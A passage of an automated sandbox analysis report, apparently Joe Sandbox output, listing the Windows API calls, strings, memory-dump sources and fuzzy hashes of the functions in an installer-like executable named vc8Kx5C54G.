                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: CloseHandleProcess$CodeExitObjectSingleSleepTerminateWait
                                                    • String ID: Helper isn't responding; killing it.$Helper process exited with failure code: 0x%x$Helper process exited, but failed to get exit code.$Helper process exited.$Stopping 64-bit helper process. (PID: %u)
                                                    • API String ID: 3355656108-1243109208
                                                    • Opcode ID: dbcea0f0447e14293e2ba497c2ba511ba70dab0111fa353bc66056d4bed30cc0
                                                    • Instruction ID: 5c1f132ce02699e8ecfae473a4aa832f70e08e49b07aa2054fbd8a494dc4d87a
                                                    • Opcode Fuzzy Hash: dbcea0f0447e14293e2ba497c2ba511ba70dab0111fa353bc66056d4bed30cc0
                                                    • Instruction Fuzzy Hash: 582171706087409AD710E779C44575BB6D4AF48309F00C82FB9DAD7693DE7CE8488B6B
                                                    APIs
                                                      • Part of subcall function 0042DDDC: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DE08
                                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,004546D3,?,00000000,00454797), ref: 00454623
                                                    • RegCloseKey.ADVAPI32(?,?,?,00000000,00000004,00000000,00000001,?,00000000,?,00000000,004546D3,?,00000000,00454797), ref: 0045475F
                                                      • Part of subcall function 0042E8C0: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00453247,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8DF
                                                    Strings
                                                    • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 0045453B
                                                    • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 0045456B
                                                    • , xrefs: 00454585
                                                    • RegCreateKeyEx, xrefs: 00454597
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: CloseCreateFormatMessageQueryValue
                                                    • String ID: $RegCreateKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                    • API String ID: 2481121983-1280779767
                                                    • Opcode ID: fb036eabf5a146f2d7e855c45c9778b44f21e44f1b6b00b130857789a6a7aa14
                                                    • Instruction ID: 79a928fbfbb5cbc52e9f584d13fa8ff479f10e23804a0d57af644d787f67e4fc
                                                    • Opcode Fuzzy Hash: fb036eabf5a146f2d7e855c45c9778b44f21e44f1b6b00b130857789a6a7aa14
                                                    • Instruction Fuzzy Hash: 4C812275A00209AFDB00DFD5C841BEEB7B9EF49305F50452AF900FB292D7789A49CB69
                                                    APIs
                                                      • Part of subcall function 00453890: CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,-cI,_iu,?,00000000,004539CA), ref: 0045397F
                                                      • Part of subcall function 00453890: CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,-cI,_iu,?,00000000,004539CA), ref: 0045398F
                                                    • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 004961D9
                                                    • SetFileAttributesA.KERNEL32(00000000,00000080,00000000,0049632D), ref: 004961FA
                                                    • CreateWindowExA.USER32(00000000,STATIC,0049633C,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 00496221
                                                    • SetWindowLongA.USER32(?,000000FC,004959B4), ref: 00496234
                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00496300,?,?,000000FC,004959B4,00000000,STATIC,0049633C), ref: 00496264
                                                    • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 004962D8
                                                    • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00496300,?,?,000000FC,004959B4,00000000), ref: 004962E4
                                                      • Part of subcall function 00453D04: WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453DEB
                                                    • 73A25CF0.USER32(?,00496307,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00496300,?,?,000000FC,004959B4,00000000,STATIC), ref: 004962FA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: FileWindow$CloseCreateHandle$AttributesCopyLongMultipleObjectsPrivateProfileStringWaitWrite
                                                    • String ID: /SECONDPHASE="%s" /FIRSTPHASEWND=$%x $STATIC
                                                    • API String ID: 170458502-2312673372
                                                    • Opcode ID: 9b06694425e575e437806c69a3063783cd4ae9b2f688ab1fdd8fd86893ac9854
                                                    • Instruction ID: 59c6668a25180793b9734d4b881d6428f2164d7595bd96eb0933aaec2009094d
                                                    • Opcode Fuzzy Hash: 9b06694425e575e437806c69a3063783cd4ae9b2f688ab1fdd8fd86893ac9854
                                                    • Instruction Fuzzy Hash: 30413070A00204AFDF11EBA5DD42FAE7BB8EB09714F61457AF500F7291D7799A048B68
                                                    APIs
                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,0042E515,?,00000000,0047DD24,00000000), ref: 0042E439
                                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042E43F
                                                    • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,0042E515,?,00000000,0047DD24,00000000), ref: 0042E48D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: AddressCloseHandleModuleProc
                                                    • String ID: %aE$.DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
                                                    • API String ID: 4190037839-4073108654
                                                    • Opcode ID: 2da1f24d3b2dac621d95ef46090c641aa8f16fa50bf8c44a058beec2af7c6974
                                                    • Instruction ID: 54e13c124a033066941eeca65415b1323707e8dcf3020f71d3dbb5d1a98da02b
                                                    • Opcode Fuzzy Hash: 2da1f24d3b2dac621d95ef46090c641aa8f16fa50bf8c44a058beec2af7c6974
                                                    • Instruction Fuzzy Hash: C5214430B10225BBDB00EAE7DC45B9E76B8EB48708F904477A500E7281E77CDE419B1C
                                                    APIs
                                                    • GetActiveWindow.USER32 ref: 00462824
                                                    • GetModuleHandleA.KERNEL32(user32.dll), ref: 00462838
                                                    • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 00462845
                                                    • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00462852
                                                    • GetWindowRect.USER32(?,00000000), ref: 0046289E
                                                    • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,00000000), ref: 004628DC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: Window$AddressProc$ActiveHandleModuleRect
                                                    • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                                    • API String ID: 2610873146-3407710046
                                                    • Opcode ID: 1a12ae3bf6497ff777cd16400bb62bc7ce249fae767d1011b5c9c7ae1396f400
                                                    • Instruction ID: 4c37a186de2a83ca6a9e6f1427afc5cce354ac5e92891655707437263646b99d
                                                    • Opcode Fuzzy Hash: 1a12ae3bf6497ff777cd16400bb62bc7ce249fae767d1011b5c9c7ae1396f400
                                                    • Instruction Fuzzy Hash: 8621C571700B006BD310E664DD41F3B3798EB84710F08063AF984DB3D2EAB8EC008B9A
                                                    APIs
                                                    • GetActiveWindow.USER32 ref: 0042F18C
                                                    • GetModuleHandleA.KERNEL32(user32.dll), ref: 0042F1A0
                                                    • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 0042F1AD
                                                    • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0042F1BA
                                                    • GetWindowRect.USER32(?,00000000), ref: 0042F206
                                                    • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D), ref: 0042F244
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: Window$AddressProc$ActiveHandleModuleRect
                                                    • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                                    • API String ID: 2610873146-3407710046
                                                    • Opcode ID: f060aae0b7a5edf3cc9df1b8e2ac1156138d1c343137e24e009784064c48acd9
                                                    • Instruction ID: fe4b6ce3f65a79f89e9c436b8398c0b3b6e1cac74b3897b930778965e8aa8e9e
                                                    • Opcode Fuzzy Hash: f060aae0b7a5edf3cc9df1b8e2ac1156138d1c343137e24e009784064c48acd9
                                                    • Instruction Fuzzy Hash: 8A21D479300710ABD700D668EC81F3B36E8EB85710F88457AF944DB3C1DA79EC048BA9
                                                    APIs
                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00458C1B,?,00000000,00458C7E,?,?,02193858,00000000), ref: 00458A99
                                                    • TransactNamedPipe.KERNEL32(?,-00000020,0000000C,-00004034,00000014,02193858,?,00000000,00458BB0,?,00000000,00000001,00000000,00000000,00000000,00458C1B), ref: 00458AF6
                                                    • GetLastError.KERNEL32(?,-00000020,0000000C,-00004034,00000014,02193858,?,00000000,00458BB0,?,00000000,00000001,00000000,00000000,00000000,00458C1B), ref: 00458B03
                                                    • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 00458B4F
                                                    • GetOverlappedResult.KERNEL32(?,?,00000000,00000001,00458B89,?,-00000020,0000000C,-00004034,00000014,02193858,?,00000000,00458BB0,?,00000000), ref: 00458B75
                                                    • GetLastError.KERNEL32(?,?,00000000,00000001,00458B89,?,-00000020,0000000C,-00004034,00000014,02193858,?,00000000,00458BB0,?,00000000), ref: 00458B7C
                                                      • Part of subcall function 00453470: GetLastError.KERNEL32(00000000,00454005,00000005,00000000,0045403A,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004978B1,00000000), ref: 00453473
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$CreateEventMultipleNamedObjectsOverlappedPipeResultTransactWait
                                                    • String ID: CreateEvent$TransactNamedPipe
                                                    • API String ID: 2182916169-3012584893
                                                    • Opcode ID: 893ade2b7d25531ff66c13e68608fa62c4cd61168c1a2b8304732b74ac398c25
                                                    • Instruction ID: 8abbb299140198d1acf2f300c186b6d7a0c7583c2a92940a340f901db1703015
                                                    • Opcode Fuzzy Hash: 893ade2b7d25531ff66c13e68608fa62c4cd61168c1a2b8304732b74ac398c25
                                                    • Instruction Fuzzy Hash: D4418771A00608EFDB15DF95CD81F9EB7F8EB48714F10406AF904F7292DA789E44CA28
                                                    APIs
                                                    • GetModuleHandleA.KERNEL32(OLEAUT32.DLL,UnRegisterTypeLib,00000000,00456CA5,?,?,00000031,?), ref: 00456B68
                                                    • GetProcAddress.KERNEL32(00000000,OLEAUT32.DLL), ref: 00456B6E
                                                    • LoadTypeLib.OLEAUT32(00000000,?), ref: 00456BBB
                                                      • Part of subcall function 00453470: GetLastError.KERNEL32(00000000,00454005,00000005,00000000,0045403A,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004978B1,00000000), ref: 00453473
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: AddressErrorHandleLastLoadModuleProcType
                                                    • String ID: GetProcAddress$ITypeLib::GetLibAttr$LoadTypeLib$OLEAUT32.DLL$UnRegisterTypeLib$UnRegisterTypeLib
                                                    • API String ID: 1914119943-2711329623
                                                    • Opcode ID: 429f9213fdce0867704162136d35381b6641e802cf297fe1828a7e481cb37b2a
                                                    • Instruction ID: 90c7a9fdd6b9eff4f50a7868ac1bc5a0a48bbd230e3c9f86fc21845b06ed4ed7
                                                    • Opcode Fuzzy Hash: 429f9213fdce0867704162136d35381b6641e802cf297fe1828a7e481cb37b2a
                                                    • Instruction Fuzzy Hash: 1B31B271A00A04AF9702EFAACC51D5BB7BDEB89746752846AFC04D3752DA38DD04C768
                                                    APIs
                                                    • RectVisible.GDI32(?,?), ref: 00416E0B
                                                    • SaveDC.GDI32(?), ref: 00416E1F
                                                    • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 00416E42
                                                    • RestoreDC.GDI32(?,?), ref: 00416E5D
                                                    • CreateSolidBrush.GDI32(00000000), ref: 00416EDD
                                                    • FrameRect.USER32(?,?,?), ref: 00416F10
                                                    • DeleteObject.GDI32(?), ref: 00416F1A
                                                    • CreateSolidBrush.GDI32(00000000), ref: 00416F2A
                                                    • FrameRect.USER32(?,?,?), ref: 00416F5D
                                                    • DeleteObject.GDI32(?), ref: 00416F67
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
                                                    • String ID:
                                                    • API String ID: 375863564-0
                                                    • Opcode ID: 4f2037b5eabd4c0ddd7adb5546328da8476fa2c27bed59ce0fc3228c4463e070
                                                    • Instruction ID: 3aa003abb57efcc62207c922e0442432c52dbc4458161ac97ea4a6727b5fec63
                                                    • Opcode Fuzzy Hash: 4f2037b5eabd4c0ddd7adb5546328da8476fa2c27bed59ce0fc3228c4463e070
                                                    • Instruction Fuzzy Hash: 7F512B716086459FDB50EF29C8C0B9777E8AF48314F15466ABD889B287C738EC81CB99
                                                    APIs
                                                    • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B46
                                                    • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B6A
                                                    • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B86
                                                    • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00404BA7
                                                    • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00404BD0
                                                    • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00404BDA
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00404BFA
                                                    • GetFileType.KERNEL32(?,000000F5), ref: 00404C11
                                                    • CloseHandle.KERNEL32(?,?,000000F5), ref: 00404C2C
                                                    • GetLastError.KERNEL32(000000F5), ref: 00404C46
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                    • String ID:
                                                    • API String ID: 1694776339-0
                                                    • Opcode ID: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
                                                    • Instruction ID: 0555156f4d2a620bb114dc01d937536d57074fdea11cd86abdfeb4dd56d828b4
                                                    • Opcode Fuzzy Hash: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
                                                    • Instruction Fuzzy Hash: 3741B3F02093009AF7305E248905B2375E5EBC0755F208E3FE296BA6E0D7BDE8458B1D
                                                    APIs
                                                    • GetSystemMenu.USER32(00000000,00000000), ref: 0042222B
                                                    • DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 00422249
                                                    • DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00422256
                                                    • DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00422263
                                                    • DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00422270
                                                    • DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 0042227D
                                                    • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 0042228A
                                                    • DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 00422297
                                                    • EnableMenuItem.USER32(00000000,0000F020,00000001), ref: 004222B5
                                                    • EnableMenuItem.USER32(00000000,0000F030,00000001), ref: 004222D1
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: Menu$Delete$EnableItem$System
                                                    • String ID:
                                                    • API String ID: 3985193851-0
                                                    • Opcode ID: 5abdbd2448cd02f00dbd9e0a18e72027fb78d1268677703bf36b2e23ad6afd93
                                                    • Instruction ID: 3d512aed001548988d9f6823c75d43677a46120aeb5bb01c9b252fa7414fdf33
                                                    • Opcode Fuzzy Hash: 5abdbd2448cd02f00dbd9e0a18e72027fb78d1268677703bf36b2e23ad6afd93
                                                    • Instruction Fuzzy Hash: 692144703407447AE720E724DD8BFABBBD8AB04708F1455A5B6487F6D3C2F9AB804698
                                                    APIs
                                                    • FreeLibrary.KERNEL32(10000000), ref: 00480FD5
                                                    • FreeLibrary.KERNEL32(00000000), ref: 00480FE9
                                                    • SendNotifyMessageA.USER32(00010414,00000496,00002710,00000000), ref: 0048105B
                                                    Strings
                                                    • GetCustomSetupExitCode, xrefs: 00480E75
                                                    • Deinitializing Setup., xrefs: 00480E36
                                                    • Not restarting Windows because Setup is being run from the debugger., xrefs: 0048100A
                                                    • Restarting Windows., xrefs: 00481036
                                                    • DeinitializeSetup, xrefs: 00480ED1
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: FreeLibrary$MessageNotifySend
                                                    • String ID: DeinitializeSetup$Deinitializing Setup.$GetCustomSetupExitCode$Not restarting Windows because Setup is being run from the debugger.$Restarting Windows.
                                                    • API String ID: 3817813901-1884538726
                                                    • Opcode ID: aeb7eeed0520e5db2a06f6f9575c7ce6fe4ce849ef8be63e157f84bdb35f0c9d
                                                    • Instruction ID: 3a7bead0d2027120b4b43806ed62f13ca717c16daae07b60498e62be9a129c9c
                                                    • Opcode Fuzzy Hash: aeb7eeed0520e5db2a06f6f9575c7ce6fe4ce849ef8be63e157f84bdb35f0c9d
                                                    • Instruction Fuzzy Hash: 6E5191307042409FD711EB65D9A5B6E77E8EB5A304F50887BF900D73A2CB38A849CB9D
                                                    APIs
                                                    • SHGetMalloc.SHELL32(?), ref: 004614EF
                                                    • GetActiveWindow.USER32 ref: 00461553
                                                    • CoInitialize.OLE32(00000000), ref: 00461567
                                                    • SHBrowseForFolder.SHELL32(?), ref: 0046157E
                                                    • CoUninitialize.OLE32(004615BF,00000000,?,?,?,?,?,00000000,00461643), ref: 00461593
                                                    • SetActiveWindow.USER32(?,004615BF,00000000,?,?,?,?,?,00000000,00461643), ref: 004615A9
                                                    • SetActiveWindow.USER32(?,?,004615BF,00000000,?,?,?,?,?,00000000,00461643), ref: 004615B2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: ActiveWindow$BrowseFolderInitializeMallocUninitialize
                                                    • String ID: A
                                                    • API String ID: 2684663990-3554254475
                                                    • Opcode ID: 1a2b14b0ce593c78e5b77d196e88522ccd9c3a7e94d83b7f20090faf3fe85af4
                                                    • Instruction ID: 3b7aa7431835c7c777c0b5d0eb650662cb24b1be5a668883a221ebb7e5be7499
                                                    • Opcode Fuzzy Hash: 1a2b14b0ce593c78e5b77d196e88522ccd9c3a7e94d83b7f20090faf3fe85af4
                                                    • Instruction Fuzzy Hash: 05310F70D00218AFDB00EFA6D885A9EBBF8EF09304F55847AF415E7251E6789A04CB5A
                                                    APIs
                                                    • GetFileAttributesA.KERNEL32(00000000,00000000,004728A1,?,?,?,00000008,00000000,00000000,00000000,?,00472AFD,?,?,00000000,00472D6C), ref: 00472804
